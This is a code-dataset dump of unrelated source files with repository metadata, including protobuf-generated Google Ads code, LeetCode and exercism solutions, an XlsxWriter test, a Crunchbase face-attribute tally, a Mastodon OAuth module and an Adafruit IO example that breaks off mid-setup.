create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='UNKNOWN', index=1, number=1,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
_descriptor.EnumValueDescriptor(
name='INVALID_STATUS', index=2, number=2,
serialized_options=None,
type=None,
create_key=_descriptor._internal_create_key),
],
containing_type=None,
serialized_options=None,
serialized_start=145,
serialized_end=213,
)
_sym_db.RegisterEnumDescriptor(_ACCOUNTLINKERRORENUM_ACCOUNTLINKERROR)
_ACCOUNTLINKERRORENUM = _descriptor.Descriptor(
name='AccountLinkErrorEnum',
full_name='google.ads.googleads.v6.errors.AccountLinkErrorEnum',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
_ACCOUNTLINKERRORENUM_ACCOUNTLINKERROR,
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=121,
serialized_end=213,
)
_ACCOUNTLINKERRORENUM_ACCOUNTLINKERROR.containing_type = _ACCOUNTLINKERRORENUM
DESCRIPTOR.message_types_by_name['AccountLinkErrorEnum'] = _ACCOUNTLINKERRORENUM
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
AccountLinkErrorEnum = _reflection.GeneratedProtocolMessageType('AccountLinkErrorEnum', (_message.Message,), {
'DESCRIPTOR' : _ACCOUNTLINKERRORENUM,
'__module__' : 'google.ads.googleads.v6.errors.account_link_error_pb2'
# @@protoc_insertion_point(class_scope:google.ads.googleads.v6.errors.AccountLinkErrorEnum)
})
_sym_db.RegisterMessage(AccountLinkErrorEnum)
DESCRIPTOR._options = None
# @@protoc_insertion_point(module_scope)
| [
"[email protected]"
] | |
03b546b952137e54723329d1559c8288fabd29d9 | 765189a475513378ae80c97faf38b99e3ce1dc28 | /algorithms/401-500/476.number-complement.py | 2a0252d82de04ee699e259e24f88bb2856487172 | [] | no_license | huilizhou/kemu_shuati | c8afc979f57634e066f6ce98da879cf1ed4e6b95 | 55b52cfff699aa71d92dd09d150ce71628b21890 | refs/heads/master | 2020-04-29T01:13:53.784665 | 2019-03-15T01:16:06 | 2019-03-15T01:16:06 | 175,723,493 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 704 | py | class Solution(object):
def findComplement(self, num):
"""
:type num: int
:rtype: int
"""
# 人家的解法
# return 2 ** (len(bin(num)) - 2) - 1 - num
# # 我的解法
# z = bin(num)[2:]
# z1 = ''
# for i in z:
# if i == '1':
# z1 += '0'
# else:
# z1 += '1'
# res = int(z1, 2)
# return res
# 人家的解法
# n = 2
# while n < num:
# n <<= 1
# return n - 1 - num
i = 1
while num >= i:
num ^= i
i <<= 1
return num
print(Solution().findComplement(5))
| [
"[email protected]"
] | |
e2daf2c10b89897b95813eb9b9aa8cb2a7c61e8b | 9b422078f4ae22fe16610f2ebc54b8c7d905ccad | /xlsxwriter/test/comparison/test_textbox04.py | 486daa245958fcdc1dee5ed14a655faaee774af2 | [
"BSD-2-Clause-Views"
] | permissive | projectsmahendra/XlsxWriter | 73d8c73ea648a911deea63cb46b9069fb4116b60 | 9b9d6fb283c89af8b6c89ad20f72b8208c2aeb45 | refs/heads/master | 2023-07-21T19:40:41.103336 | 2023-07-08T16:54:37 | 2023-07-08T16:54:37 | 353,636,960 | 0 | 0 | NOASSERTION | 2021-04-01T08:57:21 | 2021-04-01T08:57:20 | null | UTF-8 | Python | false | false | 1,369 | py | ###############################################################################
#
# Tests for XlsxWriter.
#
# Copyright (c), 2013-2021, John McNamara, [email protected]
#
from ..excel_comparison_test import ExcelComparisonTest
from ...workbook import Workbook
class TestCompareXLSXFiles(ExcelComparisonTest):
"""
Test file created by XlsxWriter against a file created by Excel.
"""
def setUp(self):
self.set_filename('textbox04.xlsx')
def test_create_file(self):
"""Test the creation of a simple XlsxWriter file with textbox(s)."""
workbook = Workbook(self.got_filename)
worksheet = workbook.add_worksheet()
chart = workbook.add_chart({'type': 'column'})
chart.axis_ids = [61365632, 64275584]
data = [
[1, 2, 3, 4, 5],
[2, 4, 6, 8, 10],
[3, 6, 9, 12, 15],
]
worksheet.write_column('A1', data[0])
worksheet.write_column('B1', data[1])
worksheet.write_column('C1', data[2])
chart.add_series({'values': '=Sheet1!$A$1:$A$5'})
chart.add_series({'values': '=Sheet1!$B$1:$B$5'})
chart.add_series({'values': '=Sheet1!$C$1:$C$5'})
worksheet.insert_chart('E9', chart)
worksheet.insert_textbox('F25', 'This is some text')
workbook.close()
self.assertExcelEqual()
| [
"[email protected]"
] | |
9c9914865de3c1df41c80e63a0c11656069a6471 | 0455bd20bfc0fdd9b8553d033891e5b31e2e9384 | /CrunchbaseInitial/CrunchbaseDataExtraction/AsianGendersNonEntrepreneurs.py | e278a5d1b35335d8f68f2f83f007fc2ada86f1e0 | [] | no_license | kyriacosar/LInC-Eclipse-Repository | a0419305b824d8adcab0d31ab71ce9e4e2307f22 | c480e071f9e571224e55983c3e9c6d0f70d0e511 | refs/heads/master | 2020-12-02T21:25:36.537787 | 2017-07-27T09:25:00 | 2017-07-27T09:25:00 | 96,314,446 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,868 | py | '''
Created on Jul 11, 2017
@author: kyriacos
'''
import json
import math
if __name__ == '__main__':
    # Input: one face-attributes JSON dictionary per line.
    in_path = "../../../../Documents/Crunchbase Project Data/Microsoft/Crunchbase Results/Data Dictionaries/Crunchbase_Non_Entrepreneurs_FaceAttributes_Dictionaries.json"
    # Output: plain-text gender/age summary for Asian non-entrepreneurs.
    out_path = "../../../../Documents/Crunchbase Project Data/Microsoft/Crunchbase Results/Data Extraction/Crunchbase_Asian_Non_Entrepreneurs_Gender_Percentages.txt"

    male = 0          # Asian records classified as male
    male_age = 0.0    # summed ages of those records
    female = 0        # Asian records classified as female
    female_age = 0.0  # summed ages of those records
    count = 0         # all Asian records, whatever the gender value

    # 'with' guarantees the files are closed (the old code leaked both handles).
    with open(in_path, "r") as e_file_in:
        for record in e_file_in:
            try:
                attrs = json.loads(record)["faceAttributes"]
                gender = str(attrs["gender"])
                ethnicity = str(attrs["ethnicity"])
                age = attrs["age"]
            except (ValueError, KeyError):
                # Malformed JSON or a record missing a needed attribute: skip it.
                continue
            if ethnicity != "Asian":
                continue
            if gender == "male":
                male += 1
                male_age += age
            elif gender == "female":
                female += 1
                female_age += age
            count += 1

    with open(out_path, "w") as e_file_out:
        # Wording fixed: this script processes the *non*-entrepreneur data set
        # (see the input/output filenames), but the old report text said
        # "Entrepreneurs" / "non Asian Entrepreneurs".
        e_file_out.write("Gender percentages among Asian Non-Entrepreneurs:\n\n")
        if count:
            e_file_out.write("Males: " + str(male) + " out of " + str(count) +
                             " with percentage " + str(male / float(count) * 100.0))
            e_file_out.write("\nFemales: " + str(female) + " out of " + str(count) +
                             " with percentage " + str(female / float(count) * 100.0))
        else:
            # Guard: the old code raised ZeroDivisionError on empty input.
            e_file_out.write("No Asian records found.")
        e_file_out.write("\n\nAverage age among Asian Non-Entrepreneurs:\n\n")
        e_file_out.write("Male: " + (str(male_age / male) if male else "n/a"))
        e_file_out.write("\nFemale: " + (str(female_age / female) if female else "n/a"))
"Kyriacos"
] | Kyriacos |
3468a788789a89e21d9f7bca64d58226d88bd41f | f329f3061e3a72b2562bb242dfe1a2ed07fe65f0 | /plugins/yongyou_zhiyuan_a6_app.py | b860deb6797eb3a2707688c9c7b7c34d87871b9e | [
"MIT"
] | permissive | ver007/getcms | 58263174355eb16bae95b74f6efaff5069b4ce56 | da03c07457abc266cacddc3ccd67126f0b03da3d | refs/heads/master | 2021-01-19T07:01:51.453626 | 2016-04-13T08:28:14 | 2016-04-13T08:28:14 | 56,134,430 | 0 | 0 | null | 2016-04-13T08:27:38 | 2016-04-13T08:27:38 | null | UTF-8 | Python | false | false | 164 | py | #!/usr/bin/env python
# encoding: utf-8
def run(whatweb, pluginname):
    """Fingerprint Yonyou Zhiyuan A6 OA by a marker in its session-helper JS."""
    # The app ships this script containing the f_showallCookie function.
    whatweb.recog_from_file(pluginname,
                            "yyoa/common/js/javaSeesion.js",
                            "f_showallCookie")
| [
"[email protected]"
] | |
088f5a935085713d1f20c82d2f95e0ba31e9fc85 | 781e2692049e87a4256320c76e82a19be257a05d | /all_data/exercism_data/python/difference-of-squares/6bb2f99092244bb48dce2c00c19a804f.py | bad5f033d6a46058afa17473abbfba5fefc147e7 | [] | no_license | itsolutionscorp/AutoStyle-Clustering | 54bde86fe6dbad35b568b38cfcb14c5ffaab51b0 | be0e2f635a7558f56c61bc0b36c6146b01d1e6e6 | refs/heads/master | 2020-12-11T07:27:19.291038 | 2016-03-16T03:18:00 | 2016-03-16T03:18:42 | 59,454,921 | 4 | 0 | null | 2016-05-23T05:40:56 | 2016-05-23T05:40:56 | null | UTF-8 | Python | false | false | 1,191 | py | # -*- coding: utf-8 -*-
from __future__ import division
def difference(n):
    """Return square_of_sum(n) - sum_of_squares(n) for n >= 0."""
    return square_of_sum(n) - sum_of_squares(n)


def square_of_sum(n):
    """Return the square of the sum of the integers 0..n (n >= 0)."""
    # Gauss: 1 + 2 + ... + n == n*(n+1)/2; exact because one factor is even.
    triangular = (n * (n + 1)) // 2
    return triangular * triangular


def sum_of_squares(n):
    """Return the sum of the squares of the integers 0..n (n >= 0)."""
    # Faulhaber: 1^2 + ... + n^2 == n*(n+1)*(2n+1)/6; the numerator is
    # always divisible by 6, so floor division is exact.
    return (n * (n + 1) * (2 * n + 1)) // 6
| [
"[email protected]"
] | |
87c0bb86ab7e49b7da4231abad6364ea302f122e | b5b1be6063901bd0bc97c3fbc2c26be1d02ce79e | /output/__init__.py | e9b0cb52d8081c4e39506efa55060fb586d86b77 | [] | no_license | dssg/rcra | ff566ff388596a733757e4de27631cbabdc7f15c | fcdd8f95c25902e46c55d85cbc4fe54196163f3d | refs/heads/master | 2021-06-11T13:09:01.686456 | 2017-02-24T05:19:51 | 2017-02-24T05:19:51 | 61,817,642 | 1 | 2 | null | null | null | null | UTF-8 | Python | false | false | 252 | py | from drain.data import FromSQL
# One row per deduplicated facility: RCRA id, ZIP code, and the dedupe
# cluster id exposed as entity_id.  NOTE(review): target=True appears to
# mark this step as a drain pipeline target -- confirm against drain docs.
facilities = FromSQL("""
select rcra_id, zip_code, dedupe_id as entity_id
from output.facilities
join dedupe.unique_map using (rcra_id)
""", tables=['output.facilities', 'output.handler_names'])
facilities.target=True
| [
"[email protected]"
] | |
d14fb1d43dc3d360f35e8f8cf30463263d7b729e | 6944866ffa5b6899c812cbd06929cd29896f557d | /oauth_dropins/mastodon.py | 567dea787adeec4c951c61cbd9db7e18b92723d2 | [
"LicenseRef-scancode-unknown-license-reference",
"LicenseRef-scancode-public-domain",
"Unlicense"
] | permissive | stedn/oauth-dropins | f7b329c69f79297dfc6f8060c10d2b069c5cb0a8 | afe5cc946e2d969a37d83e2a093195c1d5cf27db | refs/heads/master | 2021-05-23T15:56:22.354077 | 2020-03-27T17:40:51 | 2020-03-27T17:40:51 | 253,368,311 | 2 | 0 | Unlicense | 2020-04-06T01:31:32 | 2020-04-06T01:31:32 | null | UTF-8 | Python | false | false | 12,423 | py | """Mastodon OAuth drop-in.
Mastodon is an ActivityPub implementation, but it also has a REST + OAuth 2 API
independent of AP. Uh, ok, sure.
API docs: https://docs.joinmastodon.org/api/
Interestingly: as usual w/OAuth, they require registering apps beforehand...but
since AP and Mastodon are decentralized, there's no single place to register an
app. So they have an API for registering apps, per instance:
https://docs.joinmastodon.org/api/authentication/
Surprising, and unusual, but makes sense.
"""
import logging
from urllib.parse import quote_plus, unquote, urlencode, urljoin, urlparse, urlunparse
from google.cloud import ndb
import requests
from webob import exc
from . import handlers
from .models import BaseAuth
from .webutil import appengine_info, util
from .webutil.util import json_dumps, json_loads
# OAuth scopes Mastodon understands.
# https://docs.joinmastodon.org/api/permissions/
ALL_SCOPES = (
  'read',
  'read:accounts',
  'read:blocks',
  'read:favourites',
  'read:filters',
  'read:follows',
  'read:lists',
  'read:mutes',
  'read:notifications',
  'read:reports',
  'read:search',
  'read:statuses',
  'write',
  'write:accounts',
  'write:blocks',
  'write:favourites',
  'write:filters',
  'write:follows',
  'write:lists',
  'write:media',
  'write:mutes',
  'write:notifications',
  'write:reports',
  'write:statuses',
  'follow',
  'push',
)

# Instance-relative API paths (joined onto the instance base URL).
INSTANCE_API = '/api/v1/instance'
REGISTER_APP_API = '/api/v1/apps'
VERIFY_API = '/api/v1/accounts/verify_credentials'

# URL templates. Can't (easily) use urlencode() because I want to keep
# the %(...)s placeholders as is and fill them in later in code.
AUTH_CODE_API = '&'.join((
  '/oauth/authorize?'
  'response_type=code',
  'client_id=%(client_id)s',
  'client_secret=%(client_secret)s',
  # NOTE(review): this LinkedIn docs link looks like a copy/paste leftover
  # from the LinkedIn drop-in; the relevant scopes are Mastodon's, above.
  # https://docs.microsoft.com/en-us/linkedin/shared/integrations/people/profile-api?context=linkedin/consumer/context#permissions
  'scope=%(scope)s',
  # must be the same in the access token request
  'redirect_uri=%(redirect_uri)s',
  'state=%(state)s',
))
ACCESS_TOKEN_API = '/oauth/token'
def _encode_state(app, state):
  """Wrap the client's state value together with the MastodonApp key.

  Returns a JSON string carrying the app's datastore key (urlsafe) and the
  URL-quoted client state, to be round-tripped through the OAuth redirect.
  """
  payload = {
    'app_key': app.key.urlsafe().decode(),
    'state': quote_plus(state),
  }
  encoded = json_dumps(payload)
  logging.debug('Encoding wrapper state: %r', encoded)
  return encoded
def _decode_state(state):
  """Inverse of _encode_state(): return (app key string, original state)."""
  logging.debug('Decoding wrapper state: %r', state)
  parsed = json_loads(state)
  return parsed['app_key'], unquote(parsed['state'])
class MastodonApp(ndb.Model):
  """A Mastodon API OAuth2 app registered with a specific instance."""
  instance = ndb.StringProperty(required=True)  # URL, eg https://mastodon.social/
  data = ndb.TextProperty(required=True)  # JSON; includes client id/secret
  instance_info = ndb.TextProperty()  # JSON; from /api/v1/instance
  # NOTE(review): presumably the StartHandler.app_url()/app_name() values
  # used when the app was registered -- confirm against the registration code.
  app_url = ndb.StringProperty()
  app_name = ndb.StringProperty()
  created_at = ndb.DateTimeProperty(auto_now_add=True, required=True)
class MastodonAuth(BaseAuth):
  """An authenticated Mastodon user.

  Provides methods that return information about this user and make
  OAuth-signed requests to the Mastodon REST API. OAuth credentials are
  stored in the datastore; see models.BaseAuth for usage details.

  Key name is the fully qualified actor address, ie @[email protected].

  Implements get() and post() but not urlopen() or api().
  """
  app = ndb.KeyProperty()
  access_token_str = ndb.TextProperty(required=True)
  user_json = ndb.TextProperty()

  def site_name(self):
    return 'Mastodon'

  def user_display_name(self):
    """Returns the user's full ActivityPub address, eg @[email protected]."""
    return self.key.id()

  def instance(self):
    """Returns the instance base URL, eg https://mastodon.social/."""
    return self.app.get().instance

  def _user_field(self, field):
    # Pull a single field out of the stored user JSON blob.
    return json_loads(self.user_json).get(field)

  def username(self):
    """Returns the user's username, eg ryan."""
    return self._user_field('username')

  def user_id(self):
    """Returns the user's id, eg 123."""
    return self._user_field('id')

  def access_token(self):
    """Returns the OAuth access token string."""
    return self.access_token_str

  def get(self, *args, **kwargs):
    """Wraps requests.get(), resolving the path against the instance base URL
    and adding the Bearer token header."""
    url = urljoin(self.instance(), args[0])
    return self._requests_call(util.requests_get, url, *args[1:], **kwargs)

  def post(self, *args, **kwargs):
    """Wraps requests.post() and adds the Bearer token header."""
    return self._requests_call(util.requests_post, *args, **kwargs)

  def _requests_call(self, fn, *args, **kwargs):
    # Inject the OAuth bearer token, preserving any caller-supplied headers.
    kwargs.setdefault('headers', {})['Authorization'] = \
        'Bearer ' + self.access_token_str
    resp = fn(*args, **kwargs)
    try:
      resp.raise_for_status()
    except BaseException as e:
      # Log a friendlier interpretation of the HTTP error before re-raising.
      util.interpret_http_exception(e)
      raise
    return resp
class StartHandler(handlers.StartHandler):
  """Starts Mastodon auth. Requests an auth code and expects a redirect back.

  Attributes:
    DEFAULT_SCOPE: string, default OAuth scope(s) to request
    REDIRECT_PATHS: sequence of string URL paths (on this host) to register as
      OAuth callback (aka redirect) URIs in the OAuth app
    SCOPE_SEPARATOR: string, used to separate multiple scopes
  """
  NAME = 'mastodon'
  LABEL = 'Mastodon'
  DEFAULT_SCOPE = 'read:accounts'
  REDIRECT_PATHS = ()
  SCOPE_SEPARATOR = ' '

  @classmethod
  def to(cls, path, **kwargs):
    """See handlers.StartHandler.to()."""
    return super(StartHandler, cls).to(path, **kwargs)

  def app_name(self):
    """Returns the user-visible name of this application.

    To be overridden by subclasses. Displayed in Mastodon's OAuth prompt.
    """
    return 'oauth-dropins demo'

  def app_url(self):
    """Returns this application's web site.

    To be overridden by subclasses. Displayed in Mastodon's OAuth prompt.
    """
    return self.request.host_url

  def redirect_url(self, state=None, instance=None):
    """Returns the local URL for Mastodon to redirect back to after OAuth prompt.

    Args:
      state: string, user-provided value to be returned as a query parameter in
        the return redirect
      instance: string, Mastodon instance base URL, e.g.
        'https://mastodon.social'. May also be provided in the 'instance'
        request as a URL query parameter or POST body.

    Raises: ValueError if instance isn't a Mastodon instance.
    """
    # normalize instance to URL
    if not instance:
      instance = util.get_required_param(self, 'instance')

    instance = instance.strip().split('@')[-1]  # handle addresses, eg [email protected]
    parsed = urlparse(instance)
    if not parsed.scheme:
      instance = 'https://' + instance

    # fetch instance info from this instance's API (mostly to test that it's
    # actually a Mastodon instance)
    try:
      resp = util.requests_get(urljoin(instance, INSTANCE_API))
    except requests.RequestException as e:
      logging.info('Error', stack_info=True)
      resp = None

    is_json = resp and resp.headers.get('Content-Type', '').strip().startswith(
      'application/json')
    if is_json:
      logging.info(resp.text)
    if (not resp or not resp.ok or not is_json or
        # Pixelfed (https://pixelfed.org/) pretends to be Mastodon but isn't.
        # 'version' may be absent from the instance info JSON; default to ''
        # so the membership check can't raise TypeError on None.
        'Pixelfed' in (resp.json().get('version') or '')):
      msg = "%s doesn't look like a Mastodon instance." % instance
      logging.info(resp)
      logging.info(msg)
      raise ValueError(msg)

    # if we got redirected, update instance URL
    parsed = list(urlparse(resp.url))
    parsed[2] = '/'  # path
    instance = urlunparse(parsed)

    app_name = self.app_name()
    app_url = self.app_url()
    query = MastodonApp.query(MastodonApp.instance == instance,
                              MastodonApp.app_url == app_url)
    if appengine_info.DEBUG:
      # disambiguate different apps in dev_appserver, since their app_url will
      # always be localhost
      query = query.filter(MastodonApp.app_name == app_name)
    app = query.get()
    if not app:
      app = self._register_app(instance, app_name, app_url)

    # refresh the cached instance metadata on every start
    app.instance_info = resp.text
    app.put()

    logging.info('Starting OAuth for Mastodon instance %s', instance)
    app_data = json_loads(app.data)
    return urljoin(instance, AUTH_CODE_API % {
      'client_id': app_data['client_id'],
      'client_secret': app_data['client_secret'],
      'redirect_uri': quote_plus(self.to_url()),
      'state': _encode_state(app, state),
      'scope': self.scope,
    })

  def _register_app(self, instance, app_name, app_url):
    """Register a Mastodon API app on a specific instance.

    https://docs.joinmastodon.org/api/rest/apps/

    Args:
      instance: string
      app_name: string
      app_url: string

    Returns: MastodonApp
    """
    logging.info("first time we've seen Mastodon instance %s with app %s %s! "
                 "registering an API app.", instance, app_name, app_url)

    redirect_uris = set(urljoin(self.request.host_url, path)
                        for path in set(self.REDIRECT_PATHS))
    redirect_uris.add(self.to_url())

    resp = util.requests_post(
      urljoin(instance, REGISTER_APP_API),
      data=urlencode({
        'client_name': app_name,
        # Mastodon uses Doorkeeper for OAuth, which allows registering
        # multiple redirect URIs, separated by newlines.
        # https://github.com/doorkeeper-gem/doorkeeper/pull/298
        # https://docs.joinmastodon.org/api/rest/apps/
        'redirect_uris': '\n'.join(redirect_uris),
        'website': app_url,
        # https://docs.joinmastodon.org/api/permissions/
        'scopes': self.SCOPE_SEPARATOR.join(ALL_SCOPES),
      }))
    resp.raise_for_status()

    app_data = json_loads(resp.text)
    logging.info('Got %s', app_data)
    app = MastodonApp(instance=instance, app_name=app_name,
                      app_url=app_url, data=json_dumps(app_data))
    app.put()
    return app

  @classmethod
  def button_html(cls, *args, **kwargs):
    """Returns an HTML string with a login form and button for this site."""
    kwargs['form_extra'] = kwargs.get('form_extra', '') + """
<input type="url" name="instance" class="form-control" placeholder="Mastodon instance" scheme="https" required style="width: 150px; height: 50px; display:inline;" />"""
    return super(cls, cls).button_html(
      *args, input_style='background-color: #EBEBEB; padding: 5px', **kwargs)
class CallbackHandler(handlers.CallbackHandler):
  """The OAuth callback. Fetches an access token and stores it."""

  def get(self):
    """Exchanges the auth code for an access token and stores a MastodonAuth."""
    app_key, state = _decode_state(util.get_required_param(self, 'state'))

    # handle errors
    error = self.request.get('error')
    desc = self.request.get('error_description')
    if error:
      # user_cancelled_login and user_cancelled_authorize are non-standard.
      # https://tools.ietf.org/html/rfc6749#section-4.1.2.1
      if error in ('user_cancelled_login', 'user_cancelled_authorize', 'access_denied'):
        logging.info('User declined: %s', self.request.get('error_description'))
        self.finish(None, state=state)
        return
      else:
        msg = 'Error: %s: %s' % (error, desc)
        logging.info(msg)
        raise exc.HTTPBadRequest(msg)

    # look up the MastodonApp entity encoded into the state parameter
    app = ndb.Key(urlsafe=app_key).get()
    assert app
    app_data = json_loads(app.data)

    # extract auth code and request access token
    auth_code = util.get_required_param(self, 'code')
    data = {
      'grant_type': 'authorization_code',
      'code': auth_code,
      'client_id': app_data['client_id'],
      'client_secret': app_data['client_secret'],
      # redirect_uri here must be the same in the oauth code request!
      # (the value here doesn't actually matter since it's requested server side.)
      'redirect_uri': self.request.path_url,
    }
    resp = util.requests_post(urljoin(app.instance, ACCESS_TOKEN_API),
                              data=urlencode(data))
    resp.raise_for_status()
    resp_json = resp.json()
    logging.debug('Access token response: %s', resp_json)
    if resp_json.get('error'):
      raise exc.HTTPBadRequest(resp_json)

    access_token = resp_json['access_token']
    # fetch the user's profile so we can build the @user@instance key name
    user = MastodonAuth(app=app.key, access_token_str=access_token).get(VERIFY_API).json()
    logging.debug('User: %s', user)
    address = '@%s@%s' % (user['username'], urlparse(app.instance).netloc)
    auth = MastodonAuth(id=address, app=app.key, access_token_str=access_token,
                        user_json=json_dumps(user))
    auth.put()

    self.finish(auth, state=state)
| [
"[email protected]"
] | |
4a9e8aa14c6caaa64e388c73cf1955139791697f | 3a771b72dae1aae406b94726bcbcf73915577b18 | /q11.py | 7957ae29604c51312fee4b0a13e0a5bfe42decff | [] | no_license | SHANK885/Python-Basic-Programs | 4fcb29280412baa63ffd33efba56d9f59770c9dc | 157f0f871b31c4523b6873ce5dfe0d6e26a6dc61 | refs/heads/master | 2021-07-18T18:24:10.455282 | 2018-11-19T07:02:27 | 2018-11-19T07:02:27 | 138,009,231 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 584 | py | '''
Question:
Write a program which accepts a sequence of comma separated 4 digit binary numbers as its input and then check whether they are divisible by 5 or not. The numbers that are divisible by 5 are to be printed in a comma separated sequence.
Example:
0100,0011,1010,1001
Then the output should be:
1010
Notes: Assume the data is input by console.
'''
# Read the comma separated binary values and keep only those divisible by 5.
binary = input("Enter comma separated 4 digit binary number : ")
divisible = [value for value in binary.split(",") if int(value, 2) % 5 == 0]
print(",".join(divisible))
"[email protected]"
] | |
4b817c90da1a1bf413b75b098e4e7aced20b4cdb | 8034442a9778043b1d886220a3c928327b6297d4 | /Case_rbm/vlan_bond/index.py | 2225ed51c99d287e815f12237d49525615f04bb8 | [] | no_license | wangqian0818/auto_test | 5efe6d7b41ff01e6a9f10211674f55e195484a1c | 803a485d9720f090f7fa5d4482092cc4e7d9aa73 | refs/heads/master | 2023-08-24T01:27:40.956398 | 2021-11-02T02:12:14 | 2021-11-02T02:12:14 | 367,355,734 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,056 | py | #coding:utf-8
from common import baseinfo
vlanCardid = str(baseinfo.gwVlanCardid)
vlanA = str(baseinfo.vlanA)
vlanB = str(baseinfo.vlanB)
#配置下发
#列表里面的顺序依次为:查询命令,预期结果
case1_step1={
"step1":[f"export cardid={vlanCardid}&&switch-jsac --set --module 12 --switch on",f"export cardid={vlanCardid}&&switch-jsac --get | grep 12","on"],
"step2":[f"export cardid={vlanCardid}&&switch-jsac --set --module 15 --switch on",f"export cardid={vlanCardid}&&switch-jsac --get | grep 15","on"]
}
case1_step2={
"step1":[f"export cardid={vlanCardid}&&vlan-jsac --get",vlanA],
"step2":[f"export cardid={vlanCardid}&&vlan-jsac --get",vlanB],
"step3":[f"export cardid={vlanCardid}&&vlan-jsac --get |wc -l",'5']
}
case1_step11={
"step1":[f"export cardid={vlanCardid}&&switch-jsac --set --module 12 --switch off",f"export cardid={vlanCardid}&&switch-jsac --get | grep 12","off"],
"step2":[f"export cardid={vlanCardid}&&switch-jsac --set --module 15 --switch off",f"export cardid={vlanCardid}&&switch-jsac --get | grep 15","off"]
}
| [
"[email protected]"
] | |
beb8b556b8292e3e60a49a4dd5625d013750d1d7 | aa480d8b09dd7ad92c37c816ebcace24a35eb34c | /third-round/43.字符串相乘.py | cf3fd3f45529613e3a133392c58f55c8d88caa5a | [] | no_license | SR2k/leetcode | 7e701a0e99f9f05b21216f36d2f5ac07a079b97f | de131226159865dcb7b67e49a58d2ddc3f0a82c7 | refs/heads/master | 2023-03-18T03:37:02.916453 | 2022-09-16T01:28:13 | 2022-09-16T01:28:13 | 182,083,445 | 0 | 0 | null | 2023-03-08T05:44:26 | 2019-04-18T12:27:12 | Python | UTF-8 | Python | false | false | 1,634 | py | #
# @lc app=leetcode.cn id=43 lang=python3
#
# [43] 字符串相乘
#
# https://leetcode-cn.com/problems/multiply-strings/description/
#
# algorithms
# Medium (44.96%)
# Likes: 862
# Dislikes: 0
# Total Accepted: 205.5K
# Total Submissions: 457.8K
# Testcase Example: '"2"\n"3"'
#
# 给定两个以字符串形式表示的非负整数 num1 和 num2,返回 num1 和 num2 的乘积,它们的乘积也表示为字符串形式。
#
# 注意:不能使用任何内置的 BigInteger 库或直接将输入转换为整数。
#
#
#
# 示例 1:
#
#
# 输入: num1 = "2", num2 = "3"
# 输出: "6"
#
# 示例 2:
#
#
# 输入: num1 = "123", num2 = "456"
# 输出: "56088"
#
#
#
# 提示:
#
#
# 1 <= num1.length, num2.length <= 200
# num1 和 num2 只能由数字组成。
# num1 和 num2 都不包含任何前导零,除了数字0本身。
#
#
#
# @lc code=start
class Solution:
    def multiply(self, num1: str, num2: str) -> str:
        """Multiply two non-negative decimal integers given as strings.

        Grade-school long multiplication: digit i of num1 times digit j of
        num2 contributes to the coefficient of 10**(i+j), then a single
        carry-propagation pass normalizes each position to one digit.
        """
        if num1 == '0' or num2 == '0':
            return '0'

        n, m = len(num1), len(num2)
        # coefficients[k] accumulates the (possibly > 9) coefficient of 10**k
        coefficients = [0] * (n + m)
        for i, a in enumerate(reversed(num1)):
            digit_a = ord(a) - ord('0')
            for j, b in enumerate(reversed(num2)):
                coefficients[i + j] += digit_a * (ord(b) - ord('0'))

        # normalize: propagate carries so every position holds a single digit
        out = []
        carry = 0
        for coefficient in coefficients:
            carry, digit = divmod(coefficient + carry, 10)
            out.append(str(digit))

        # drop leading zeros (stored least-significant first, so trim the tail)
        while out and out[-1] == '0':
            out.pop()
        return ''.join(reversed(out))
# @lc code=end

# Quick manual checks; expected output: 6, then 56088.
print(Solution().multiply("2", "3"))
print(Solution().multiply("123", "456"))
| [
"[email protected]"
] | |
1edb79a9fc5cdd76785d4f5fbdf777056346feff | 2bcc421ee345b00cf805c543b37d18b5d019dc04 | /adafruit-circuitpython-bundle-6.x-mpy-20201126/examples/adafruit_io_simpletest.py | 13f48ce77609ae495c9aae8bea5cbbb6b5a5fc34 | [] | no_license | saewoonam/sc-current-source-titano | 5a1ad46889c1b09c168424901fd71cb4eab5c61b | 1c136aa8b61268d9ac0b5a682b30ece70ab87663 | refs/heads/main | 2023-03-02T22:12:26.685537 | 2021-02-09T03:28:01 | 2021-02-09T03:28:01 | 317,299,900 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 4,684 | py | # Example of using the Adafruit IO CircuitPython MQTT client
# to subscribe to an Adafruit IO feed and publish random data
# to be received by the feed.
#
# Example by Tony DiCola for Adafruit Industries
# Modified by Brent Rubell for Adafruit Industries, 2019
import time
from random import randint
import board
import busio
from digitalio import DigitalInOut
from adafruit_esp32spi import adafruit_esp32spi
from adafruit_esp32spi import adafruit_esp32spi_wifimanager
import adafruit_esp32spi.adafruit_esp32spi_socket as socket
import neopixel
import adafruit_minimqtt.adafruit_minimqtt as MQTT
from adafruit_io.adafruit_io import IO_MQTT
### WiFi ###
# Get wifi details and more from a secrets.py file
try:
from secrets import secrets
except ImportError:
print("WiFi secrets are kept in secrets.py, please add them there!")
raise
# If you are using a board with pre-defined ESP32 Pins:
esp32_cs = DigitalInOut(board.ESP_CS)
esp32_ready = DigitalInOut(board.ESP_BUSY)
esp32_reset = DigitalInOut(board.ESP_RESET)
# If you have an externally connected ESP32:
# esp32_cs = DigitalInOut(board.D9)
# esp32_ready = DigitalInOut(board.D10)
# esp32_reset = DigitalInOut(board.D5)
spi = busio.SPI(board.SCK, board.MOSI, board.MISO)
esp = adafruit_esp32spi.ESP_SPIcontrol(spi, esp32_cs, esp32_ready, esp32_reset)
"""Use below for Most Boards"""
status_light = neopixel.NeoPixel(
board.NEOPIXEL, 1, brightness=0.2
) # Uncomment for Most Boards
"""Uncomment below for ItsyBitsy M4"""
# status_light = dotstar.DotStar(board.APA102_SCK, board.APA102_MOSI, 1, brightness=0.2)
# Uncomment below for an externally defined RGB LED
# import adafruit_rgbled
# from adafruit_esp32spi import PWMOut
# RED_LED = PWMOut.PWMOut(esp, 26)
# GREEN_LED = PWMOut.PWMOut(esp, 27)
